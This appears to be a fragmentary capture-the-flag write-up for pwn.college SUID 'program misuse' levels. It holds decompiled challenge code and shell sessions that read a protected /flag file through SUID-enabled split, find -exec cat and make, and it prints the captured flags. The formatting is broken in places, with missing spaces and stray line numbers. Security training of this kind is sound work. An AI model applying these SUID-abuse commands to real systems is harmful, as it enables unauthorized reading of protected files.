int __cdecl main(int argc, constchar **argv, constchar **envp) { printf("Welcome to %s!\n\n", *argv); puts("This challenge is part of a series of programs that"); puts("exposes you to very simple programs that let you directly read the flag."); if ( chmod("/usr/bin/head", 04755u) ) __assert_fail("chmod(\"/usr/bin/head\", 04755) == 0", "<stdin>", 0xDu, "main"); puts(byte_20DB); puts("I just set the SUID bit on /usr/bin/head."); puts("Try to use it to read the flag!"); puts(byte_20DB); printf( "IMPORTANT: make sure to run me (%s) every time that you restart\n" "this challenge container to make sure that I set the SUID bit on /usr/bin/head!\n", *argv); return0; }
$ tldr base32 base32 Encode or decode file or standard input to/from Base32, to standard output.More information: https://www.gnu.org/software/coreutils/base32.
- Encode a file: base32 {{path/to/file}}
- Decode a file: base32 --decode {{path/to/file}}
- Encode from stdin: {{somecommand}} | base32
- Decode from stdin: {{somecommand}} | base32 --decode
level15
1 2
- Split afile with at most 512 bytes in each split without breaking lines: split -C {{512}} {{path/to/file}}
1 2 3 4 5 6 7 8 9 10 11 12
hacker@program-misuse-level-16:~$ /challenge/babysuid_level16 Welcome to /challenge/babysuid_level16!
This challenge is part of a series of programs that require you to understand their output to derive the flag fromit.
I just setthe SUID bit on /usr/bin/split. Try to use ittoreadthe flag!
IMPORTANT: make sure torunme (/challenge/babysuid_level16) everytimethat you restart this challenge container to make sure that I setthe SUID bit on /usr/bin/split! hacker@program-misuse-level-16:~$ split -C 512 /flag
hacker@program-misuse-level-25:~$ /usr/bin/find / -name flag -exec cat {} \; cat: /opt/radare2/libr/flag: Is a directory cat: /usr/local/share/radare2/5.8.4/flag: Is a directory cat: /usr/local/lib/python3.8/dist-packages/pwnlib/flag: Is a directory pwn.college{QFEr6tID0OyL1c-PbyhlCdh4gCj.01N2EDL1cTMzEzW}
level26
1 2 3 4 5 6 7
$cat Makefile read_flag: cat /flag
$ make read_flag cat /flag pwn.college{MG-nUq6j7A43o21RPF_4o7wfED8.0FO2EDL1cTMzEzW}